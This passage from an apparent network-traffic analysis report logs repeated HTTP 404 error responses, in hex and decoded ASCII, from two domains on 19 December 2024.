68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:57 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:00:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:06 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:07 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:15 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:16 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:23 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:25 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 10:01:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
